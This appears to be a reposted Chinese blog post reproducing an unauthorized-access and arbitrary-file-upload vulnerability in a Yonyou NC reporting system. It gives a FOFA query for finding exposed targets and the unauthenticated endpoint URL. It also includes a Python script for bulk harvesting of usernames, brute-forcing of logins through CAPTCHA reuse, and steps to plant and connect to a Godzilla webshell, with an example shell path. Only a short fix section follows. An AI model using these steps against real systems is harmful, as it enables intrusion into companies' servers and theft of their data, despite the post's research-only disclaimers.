漏洞复现|某友集团报表系统存在未授权访问+任意文件上传利用漏洞

admin 2024年5月15日21:06:54评论107 views字数 2368阅读7分53秒阅读模式

点击上方蓝字关注我们

BEGINNING OF SPRING

漏洞复现|某友集团报表系统存在未授权访问+任意文件上传利用漏洞

0x01

      阅读须知       

Reading Instructions

漏洞复现|某友集团报表系统存在未授权访问+任意文件上传利用漏洞

    数字人才创研院秉承探究学习与交流的理念,一切从降低已有潜在威胁出发,所有发布的技术文章仅供参考,未经授权请勿利用文章中的技术内容对任何计算机系统进行入侵操作,否则对他人或单位而造成的直接或间接后果和损失,均由使用者本人负责。

    郑重声明:本文所提供的工具与思路仅用于学习与研究,禁止用于非法目的!
团队已致电客户说明并告知详细解决方案!
漏洞复现|某友集团报表系统存在未授权访问+任意文件上传利用漏洞

0x02

       漏洞概述      

Vulnerability Overview

  *友集团企业的合并报表过程已经⾮简单的基于合并⼯作底稿和合并相关准则的合并报表编报会计业务,这个过程或者活动已经升级为管理活动,具有计划性、协调性。

  该合并报表系统的service接口存在未授权访问+任意文件上传漏洞,攻击者通过漏洞可以获取可以获取服务器权限信息。

漏洞复现|某友集团报表系统存在未授权访问+任意文件上传利用漏洞

0x03

       漏洞复现      

Vulnerability Recurrence

漏洞复现|某友集团报表系统存在未授权访问+任意文件上传利用漏洞

fofa:app="*友-UFIDA-NC"

1.执行如下POC进行未授权访问信息的探测,可以获取系统用户名敏感信息。

/service/~iufo/com.ufida.web.action.ActionServlet?TableSelectedID&TreeSelectedID&action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease---http://目标资产/service/...---

漏洞复现|某友集团报表系统存在未授权访问+任意文件上传利用漏洞

2.编写脚本快速获取目标资产用户名敏感信息

import reimport requestswith open('urls.txt', 'r') as f:    urls = f.readlines()with open('result.txt', 'w') as f:    for url in urls:        url = url.strip()          try:            response = requests.get(url)            if response.status_code == 200:                                pattern = r"'>((.*?))"                 matches = re.findall(pattern, response.text)                for match in matches:                    f.write(match + 'n')          except requests.exceptions.RequestException as e:            print(f'Error: {e}')--------【操作说明】--------首先本地需要创建urls.txt,然后将目标资产的url全路径放置其中,最后再创建result.txt进行结果输出。

3.借助burpsuite进行交叉爆破,得到获取用户名的登录账号和访问密码(登录界面存在验证码复用问题)。

漏洞复现|某友集团报表系统存在未授权访问+任意文件上传利用漏洞

4.登录时会弹出一个新窗口,建议选择不关闭旧窗口,同时在登录状态下的旧窗口借助哥斯拉木马进行发布给已经登录上的账号。

  【注意】需要用ie7/8低版本,为了运行安全,建议在虚拟机win7及其以上版本进行访问,由于新窗口做了限制,因此无法进行url修改

/service/~iufo/com.ufida.web.action.ActionServlet?TableSelectedID&TreeSelectedID&action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease

漏洞复现|某友集团报表系统存在未授权访问+任意文件上传利用漏洞

(文章仅限技术交流,禁止非授权操作!)

5.发布完成后,可以在新窗口中选择该账户点击“我接收到的消息”,即可进行木马查看。

漏洞复现|某友集团报表系统存在未授权访问+任意文件上传利用漏洞

6.复制完整的木马路径并进行哥斯拉的连接,最后完美显示连接成功(可未授权访问该木马漏洞复现|某友集团报表系统存在未授权访问+任意文件上传利用漏洞

http://x.x.x.x/iufotempfile/6g2pcjszy5uaukerd6gv3qbuo61wrb/system_xxxxx.jsp//参考马马地址如上

漏洞复现|某友集团报表系统存在未授权访问+任意文件上传利用漏洞

(文章仅限技术交流,禁止非授权操作!)

0x04

     漏洞脚本     

Vulnerability script

1.Nuclei验证脚本命令使用如下:

nuclei.exe -t youNC-service-unauthorized-access.yaml -l youNC-service-unauthorized-access_Subs.txt--------------------------------------------youNC-service-unauthorized-access_Subs.txt可以结合实际情况自定义--------------------------------------------

2.Nuclei的运行截图如下:

漏洞复现|某友集团报表系统存在未授权访问+任意文件上传利用漏洞

3.关注公众号回复:用友NC ,获取脚本

0x05

     修复建议     

Repair Suggestions

1.实施产品的权限访问控制,降低互联网搜索引擎的查询。

2.加强后台认证要求(如AAAA策略等),提高口令的安全性。

3.增强关键页面的安全性,提升WEB后台的安全访问控制权限能力。

漏洞复现|某友集团报表系统存在未授权访问+任意文件上传利用漏洞

往期推荐 · 值得阅看

2023全网最优渗透研学靶场汇总(上)

2023-02-23

漏洞复现|某友集团报表系统存在未授权访问+任意文件上传利用漏洞

漏洞复现|北京网康 NS-ASG安全网关存在远程命令执行漏洞

2023-06-19

漏洞复现|某友集团报表系统存在未授权访问+任意文件上传利用漏洞

漏洞复现|深信服科技EDR平台存在任意用户登录漏洞

2023-06-07

漏洞复现|某友集团报表系统存在未授权访问+任意文件上传利用漏洞

漏洞复现|联软科技安全准入门户平台存在远程代码执行漏洞

2023-06-02

漏洞复现|某友集团报表系统存在未授权访问+任意文件上传利用漏洞

PHPMyadmin的Getshell方法汇总

2023-07-01

漏洞复现|某友集团报表系统存在未授权访问+任意文件上传利用漏洞

知识分享|Redis未授权访问漏洞汇集

2023-06-26

漏洞复现|某友集团报表系统存在未授权访问+任意文件上传利用漏洞

END

原文始发于微信公众号(数字人才创研院):漏洞复现|某友集团报表系统存在未授权访问+任意文件上传利用漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月15日21:06:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现|某友集团报表系统存在未授权访问+任意文件上传利用漏洞https://cn-sec.com/archives/2051829.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息